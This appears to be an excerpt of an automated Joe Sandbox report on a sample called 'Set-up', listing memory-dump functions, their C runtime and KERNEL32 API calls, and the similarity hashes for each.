free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87645
free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87651
free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB8765D
free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87669
free.MSVCR100(?,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87675

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: free$_lock$CriticalDecrementEnterInterlockedSection
String ID:
API String ID: 3254847666-0
Opcode ID: e474b31f19507d10e31a6d55371f784ac083db41777c003da64b7b6c3c119638
Instruction ID: 65b90eb0ba79d41d5e11f73c596d2bc332ba617e8f2498a90ed9a5c3a712fa83
Opcode Fuzzy Hash: e474b31f19507d10e31a6d55371f784ac083db41777c003da64b7b6c3c119638
Instruction Fuzzy Hash: 0231C472B597C19AE7209B7A9985B0E33A8AF41FD9F60444DE5549B180FB7CEE808610

Function 6BB729FE Relevance: 19.6, APIs: 13, Instructions: 93COMMON

Download Yara Rule

APIs

GetFullPathNameA.KERNEL32(?,?,00000000,?), ref: 6BB72A42
GetFullPathNameA.KERNEL32(?,00000000,00000000,00000000), ref: 6BB87A58
GetLastError.KERNEL32 ref: 6BB87A5E
__dosmaperr.LIBCMT(00000000), ref: 6BB87A65
_errno.MSVCR100 ref: 6BB87A7F
calloc.MSVCR100(?,00000001), ref: 6BB87A94
_errno.MSVCR100 ref: 6BB87AA5
_errno.MSVCR100 ref: 6BB87AB2
_invalid_parameter_noinfo.MSVCR100 ref: 6BB87ABD
free.MSVCR100(00000000), ref: 6BB87ACB
_errno.MSVCR100 ref: 6BB87AD1
free.MSVCR100(00000000), ref: 6BB87AE8
_getcwd.MSVCR100(?,?), ref: 6BB87AF9

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$FullNamePathfree$ErrorLast__dosmaperr_getcwd_invalid_parameter_noinfocalloc
String ID:
API String ID: 4002649621-0
Opcode ID: e98d502299391c2a809cc6ed4aa46432ddf00955ca7c2eed3814f769559d4967
Instruction ID: 3afd8cc6c6a7e90d735f6ab8be64212d3a5444937d90e0e7ee56e2a4f1be91ca
Opcode Fuzzy Hash: e98d502299391c2a809cc6ed4aa46432ddf00955ca7c2eed3814f769559d4967
Instruction Fuzzy Hash: D721B5726082C9AEDB105EB6DCC1A5E37A9EB417ACB140465F5148B190FBBDCE41CFA0

Function 6BB61E61 Relevance: 19.6, APIs: 13, Instructions: 93COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6BB61EA6
GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 6BB87B41
GetLastError.KERNEL32 ref: 6BB87B47
__dosmaperr.LIBCMT(00000000), ref: 6BB87B4E
_errno.MSVCR100 ref: 6BB87B6B
calloc.MSVCR100(?,00000002), ref: 6BB87B80
_errno.MSVCR100 ref: 6BB87B91
_errno.MSVCR100 ref: 6BB87B9E
_invalid_parameter_noinfo.MSVCR100 ref: 6BB87BA9
free.MSVCR100(00000000), ref: 6BB87BB7
_errno.MSVCR100 ref: 6BB87BBD
free.MSVCR100(00000000), ref: 6BB87BD4
_wgetcwd.MSVCR100(?,?), ref: 6BB87BE5

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$FullNamePathfree$ErrorLast__dosmaperr_invalid_parameter_noinfo_wgetcwdcalloc
String ID:
API String ID: 3145916893-0
Opcode ID: 4087ecddb8bf2879b2bc6dfefd196f1baa78567e70f6250dd711a1b8dcf68be5
Instruction ID: 3dd5e74c8a6f3b74a06c0d572e7efbdcd32abae2091be680ecff6986d172cc48
Opcode Fuzzy Hash: 4087ecddb8bf2879b2bc6dfefd196f1baa78567e70f6250dd711a1b8dcf68be5
Instruction Fuzzy Hash: 5B217F726082C9AFDB015FB6DCE1E6E37AAEB4139CF144465E5108B1A0FBBCCC408A61

Function 6BB6F805 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BB6F89E
DName::DName.LIBCMT ref: 6BB6F96F
DName::DName.LIBCMT ref: 6BB8D13B

Strings

`non-type-template-parameter, xrefs: 6BB8D126

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: NameName::
String ID: `non-type-template-parameter
API String ID: 1333004437-4247534891
Opcode ID: 07dfb29ad0b39042820a9c8a962d1e3bf152fa2cf1d2642d42174887cf321d49
Instruction ID: b52a0ee7df4f32dffb6328994e5a140ab1a62a660f2fa207a3013b53555c84dc
Opcode Fuzzy Hash: 07dfb29ad0b39042820a9c8a962d1e3bf152fa2cf1d2642d42174887cf321d49
Instruction Fuzzy Hash: DE41E1B19442C5EFDB05DF68D881AAA3BB5EF42788F0480AED9448B251EB39DD46CB40

Function 6BB77949 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 109COMMON

Download Yara Rule

APIs

__TypeMatch.MSVCR100(00000003,?,00000000), ref: 6BB779C7
_getptd.MSVCR100 ref: 6BB779D7
_getptd.MSVCR100 ref: 6BB8CAFB
_getptd.MSVCR100 ref: 6BB8CB0D
_getptd.MSVCR100 ref: 6BB8CB69
_getptd.MSVCR100 ref: 6BB8CB7B

Strings

csm, xrefs: 6BB77979
csm, xrefs: 6BB8CB3E
MOC, xrefs: 6BB8CAC7
RCC, xrefs: 6BB8CACE

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _getptd$MatchType
String ID: MOC$RCC$csm$csm
API String ID: 965401092-1441736206
Opcode ID: 6b576735584244a2e40a0ad04f2e8cbcfa8abaa534f1e88dcbd532e97dde6d74
Instruction ID: 6533c164b21c523e5d675e7e6cea0b53c0befe355a0b7a1b7b01f5375bea65a5
Opcode Fuzzy Hash: 6b576735584244a2e40a0ad04f2e8cbcfa8abaa534f1e88dcbd532e97dde6d74
Instruction Fuzzy Hash: 7A31C271501688EFDB20DF6AC480B6D73B8EF41304F5446AAD86587161D77CD585CB92

Function 6BB6F608 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BB8D596
operator+.LIBCMT ref: 6BB8D600

Strings

cli::array<, xrefs: 6BB8D5CA
cli::pin_ptr<, xrefs: 6BB8D5F1
void , xrefs: 6BB8D59E
void, xrefs: 6BB8D591

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: NameName::operator+
String ID: cli::array<$cli::pin_ptr<$void$void
API String ID: 1360548761-456688812
Opcode ID: 01e45e69fcd643550b24e91bad66225a4aa3d78dcf1e654953c1d4daddf82ecd
Instruction ID: edfd6485d16296b8fa5c81c2c829796843681aac2426891f79cb25814756f676
Opcode Fuzzy Hash: 01e45e69fcd643550b24e91bad66225a4aa3d78dcf1e654953c1d4daddf82ecd
Instruction Fuzzy Hash: 3C217C75944289AFDF05DF64E841DEE3BB9EF05358F4044ABE9149B250EB39EA40CB50

Function 6BB6826F Relevance: 16.7, APIs: 11, Instructions: 193COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 6BB67493
free.MSVCR100(?), ref: 6BB6749F
free.MSVCR100(?,?), ref: 6BB674AA
_calloc_crt.MSVCR100(00000001,00000050), ref: 6BB68292
_malloc_crt.MSVCR100(00000004), ref: 6BB682B2

Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5

_malloc_crt.MSVCR100(00000004), ref: 6BB682D5
free.MSVCR100(00000000), ref: 6BB91699
free.MSVCR100(00000000), ref: 6BB916A5
free.MSVCR100(?,00000000), ref: 6BB916AD
___free_lconv_num.LIBCMT ref: 6BB916BC

Part of subcall function 6BB6767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676C4
Part of subcall function 6BB6767A: _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6BB676D3
Part of subcall function 6BB6767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676EC

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: free$InfoLocale_calloc_crt_malloc_crt$DecrementInterlocked___free_lconv_nummalloc
String ID:
API String ID: 2828155784-0
Opcode ID: a85e83d3c79d5b18fff3dc2ddf408c6c3061759aa6f01854116d04b1bbbe49b3
Instruction ID: 86489e12fce8b748493df169831704c47d6c0291ff40c2e7d55417c31b2cbf1c
Opcode Fuzzy Hash: a85e83d3c79d5b18fff3dc2ddf408c6c3061759aa6f01854116d04b1bbbe49b3
Instruction Fuzzy Hash: 9351F472904294AFDB10DF79CC81B9A7BF9EB46780F1445AAE905DB280F7B8DD40CB60

Function 6BB6AC1E Relevance: 16.6, APIs: 11, Instructions: 119COMMON

Download Yara Rule

APIs

_getptd.MSVCR100(6BB6AC68,00000014,6BB6B231,000000FD,6BB6B281), ref: 6BB6AC2E

Part of subcall function 6BB6AC84: _getptd.MSVCR100(6BB6ACE0,0000000C,6BB6D0AA,?,?,6BB69233,?), ref: 6BB6AC90
Part of subcall function 6BB6AC84: _lock.MSVCR100(0000000D), ref: 6BB6ACA7

_malloc_crt.MSVCR100(00000220,6BB6AC68,00000014,6BB6B231,000000FD,6BB6B281), ref: 6BB6B81E
InterlockedDecrement.KERNEL32(?), ref: 6BB6B859
InterlockedIncrement.KERNEL32(00000000), ref: 6BB6B87B
_lock.MSVCR100(0000000D), ref: 6BB6B896
InterlockedDecrement.KERNEL32 ref: 6BB6B90D
InterlockedIncrement.KERNEL32(00000000), ref: 6BB6B922

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Interlocked$DecrementIncrement_getptd_lock$_malloc_crt
String ID:
API String ID: 4169461591-0
Opcode ID: 849805874b8ae2d8a0e6e0e66f061f3925fac8afa1c2bffab30510486329dc28
Instruction ID: 233b18bd34d6f3ad89dc9dd1bc12bafd7e51d5093a28921b83e413ad6e2e1004
Opcode Fuzzy Hash: 849805874b8ae2d8a0e6e0e66f061f3925fac8afa1c2bffab30510486329dc28
Instruction Fuzzy Hash: 7541B0319182D49FCB209F75C882B4D7BF0EB0A798F114969E4519B2A1FB7DCD81CB60

Function 6BB77A24 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT(?,?), ref: 6BB77A6D
_getptd.MSVCR100 ref: 6BB77A74
_getptd.MSVCR100 ref: 6BB77A82
_getptd.MSVCR100 ref: 6BB77A90
_getptd.MSVCR100 ref: 6BB77A9B
_getptd.MSVCR100 ref: 6BB77AA6

Strings

csm, xrefs: 6BB77A43

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _getptd$CreateFrameInfo
String ID: csm
API String ID: 4181383844-1018135373
Opcode ID: 8ec51cf5f6161e2fe22f505791f89f019e248bd25405dbe91789e180930a91ee
Instruction ID: da187fb47cca01cf886b5b5d518287b72d882a6e12798c46e8e4691723c09bac
Opcode Fuzzy Hash: 8ec51cf5f6161e2fe22f505791f89f019e248bd25405dbe91789e180930a91ee
Instruction Fuzzy Hash: A2119D31800781DED630AF778045B5877A4FF51724F948ABAD4788B5A1DB78EA44CB91

Function 6BB7608F Relevance: 15.2, APIs: 10, Instructions: 245COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000009,?,?,00000000,00000000), ref: 6BB7612C
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 6BB76192
MultiByteToWideChar.KERNEL32(00000000,00000009,6BB76293,00000000,00000000,00000000), ref: 6BB761AB
MultiByteToWideChar.KERNEL32(00000000,00000001,6BB76293,00000000,00000000,00000000), ref: 6BB761FC
CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 6BB76210
_freea_s.MSVCR100(00000000), ref: 6BB7621A
_freea_s.MSVCR100(00000000), ref: 6BB76223

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$_freea_s$CompareString
String ID:
API String ID: 3891795400-0
Opcode ID: bc3b5cdb8b63406cd4ffafd4cee6e3fb9a81105a924e89606b36c92cb1c8d66d
Instruction ID: 6c97d502557a9cfd9e12fda9349425883d5a38262a0178ac1cad6153194b0a98
Opcode Fuzzy Hash: bc3b5cdb8b63406cd4ffafd4cee6e3fb9a81105a924e89606b36c92cb1c8d66d
Instruction Fuzzy Hash: D881D131A0068A9FDF21AE68DC95BEE7BB2DF46720F1401B9E931E61A1D73DD940CB50

Function 6BB64F99 Relevance: 15.2, APIs: 10, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000100,00000001,00000000,?,?,?,?,?,?,?), ref: 6BB64FE8
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6BB6504B
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 6BB65067
LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 6BB650D1
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 6BB650F0
_freea_s.MSVCR100(00000000), ref: 6BB650FA
_freea_s.MSVCR100(?), ref: 6BB65103
malloc.MSVCR100(00000008), ref: 6BB90D21

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$String_freea_s$malloc
String ID:
API String ID: 1406006131-0
Opcode ID: edf1a43f88479c74fab4b35de8ddbf58f5152848d95372eb901b4d094ed68de4
Instruction ID: 09cfa2e6c014c1716e58149110def882969528df945596686c86edfb136e9bcc
Opcode Fuzzy Hash: edf1a43f88479c74fab4b35de8ddbf58f5152848d95372eb901b4d094ed68de4
Instruction Fuzzy Hash: 0551B07290018EBFDF018FA4CCA18AE7BB6EF49394F504469F62496111E739CD60DBA4

Function 6BBA0CF5 Relevance: 15.2, APIs: 10, Instructions: 153COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BBA0CFC
EnterCriticalSection.KERNEL32(?,00000010,6BB98C33,00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000), ref: 6BBA0D11
??2@YAPAXI@Z.MSVCR100(0000000C), ref: 6BBA0D51
??2@YAPAXI@Z.MSVCR100(00000120), ref: 6BBA0DA4
_memset.LIBCMT(00000000,00000000,00000120), ref: 6BBA0DB6
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BBA0DDB
_memset.LIBCMT(00000020,00000000,00000100), ref: 6BBA0DEF
SetEvent.KERNEL32(?), ref: 6BBA0E96
LeaveCriticalSection.KERNEL32(?), ref: 6BBA0EA3
CloseHandle.KERNEL32(00000000), ref: 6BBA0EC7

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ??2@CriticalEventSection_memset$CloseCreateEnterH_prolog3HandleLeave
String ID:
API String ID: 3129499143-0
Opcode ID: af4ab94ad1ed1f650ab9a9cf020017ad5d7951d3a29a08950aabb1fd5d5969bb
Instruction ID: b40f29f8611f75dd35c3893806f2e73f2d01ed30d38709bb4dd1ff8a7ace2549
Opcode Fuzzy Hash: af4ab94ad1ed1f650ab9a9cf020017ad5d7951d3a29a08950aabb1fd5d5969bb
Instruction Fuzzy Hash: 75518A71E057429FD724CF28C485BAABBF4FF09714F0084A9E89ADB650E778E950CB90

Function 6BB70E33 Relevance: 15.1, APIs: 10, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000080,00000000,6BC035D0,00000001,?,?,00000000,?,?,?,?,6BC035D0,?), ref: 6BB70E8F

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 67c3e6cf202be5eacefdbbcc078799246fa8f088fa611e438c400548b29ef971
Instruction ID: 044dacc291e8982a3aeb4f938125ea72ccaeeb7e513516b161206c4411eae244
Opcode Fuzzy Hash: 67c3e6cf202be5eacefdbbcc078799246fa8f088fa611e438c400548b29ef971
Instruction Fuzzy Hash: 084106729002D6EFDB21AF68C8D0DAD3BB5EF42314B4001AAE5305B2D0D7398D81CF92

Function 6BBA1F26 Relevance: 15.1, APIs: 10, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6BBA1F2D
??2@YAPAXI@Z.MSVCR100(00000024,0000003C,6BBA1F21,?,?,?,?,?,6BBA03E2,?,00000000,6BC04628,0000000C,6BBA0342,?,?), ref: 6BBA1F36

Part of subcall function 6BB602C1: malloc.MSVCR100(?), ref: 6BB602CC

memcpy.MSVCR100(00000000,6BC06310,00000024,0000003C,6BBA1F21,?,?,?,?,?,6BBA03E2,?,00000000,6BC04628,0000000C,6BBA0342), ref: 6BBA1F53
std::exception::exception.LIBCMT(?,?,6BC00034,?,00000002,00000001), ref: 6BBA1F86
_CxxThrowException.MSVCR100(?,6BC00034,?,00000002,00000001), ref: 6BBA1F9B
std::exception::exception.LIBCMT(?,6BB93A58,6BC00018,?), ref: 6BBA1FBA
?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001), ref: 6BBA1FDD
?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001), ref: 6BBA1FE8
Concurrency::unsupported_os::unsupported_os.LIBCMT(00000002,00000001), ref: 6BBA1FFE
Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000002,00000001), ref: 6BBA201A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Policy$Concurrency::unsupported_os::unsupported_osConcurrency@@ElementKey@2@@Policy@SchedulerValue@std::exception::exception$??2@ExceptionH_prolog3_catchThrowmallocmemcpy
String ID:
API String ID: 1209366282-0
Opcode ID: a5d368ad25d0cf9b8b6885de7f8a2f0e9c77d739624a18d6c6883f17ea0685e3
Instruction ID: 11059b78f0a72d427d1faf375dbd8b0c5dfde5bec579e029d81d31d7f3337de8
Opcode Fuzzy Hash: a5d368ad25d0cf9b8b6885de7f8a2f0e9c77d739624a18d6c6883f17ea0685e3
Instruction Fuzzy Hash: 0D31D171D081D8AFCF14EF75D892ADCB7B5EF06398F044026E505AB240EB7D9A05CBA1

Function 6BB7786B Relevance: 15.1, APIs: 10, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB7789E
_errno.MSVCR100 ref: 6BB893FC
_invalid_parameter_noinfo.MSVCR100 ref: 6BB89407
_errno.MSVCR100 ref: 6BB89425
_errno.MSVCR100 ref: 6BB89432
_errno.MSVCR100 ref: 6BB8943C
_errno.MSVCR100 ref: 6BB8946C
_errno.MSVCR100 ref: 6BB89476
_errno.MSVCR100 ref: 6BB89489
_invalid_parameter_noinfo.MSVCR100 ref: 6BB89494

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: d7431908032102f2501069090c76bcfd4018bb8676c7979756ea6e7e940e275a
Instruction ID: 89ec73fd08532e25255ef6dbc768b4acbbae5abbee6b720a77ac5e2fdecb7341
Opcode Fuzzy Hash: d7431908032102f2501069090c76bcfd4018bb8676c7979756ea6e7e940e275a
Instruction Fuzzy Hash: 9521E5318046C5ABCF355FB6D881A6E3724EF42378B1512D8E978472A1EB7C8800CFB2

Function 6BB77EC4 Relevance: 15.1, APIs: 10, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.MSVCR100(00000008,6BB77F98,00000018,6BBAC0CB,00000001,00000001,00000000,?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9), ref: 6BB77EE6
DecodePointer.KERNEL32(6BB77F98,00000018,6BBAC0CB,00000001,00000001,00000000,?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F20
DecodePointer.KERNEL32(?,6BBAC0FC,000000FF,?,6BB87507,00000011,00000001,?,6BB621A9,0000000D), ref: 6BB77F35
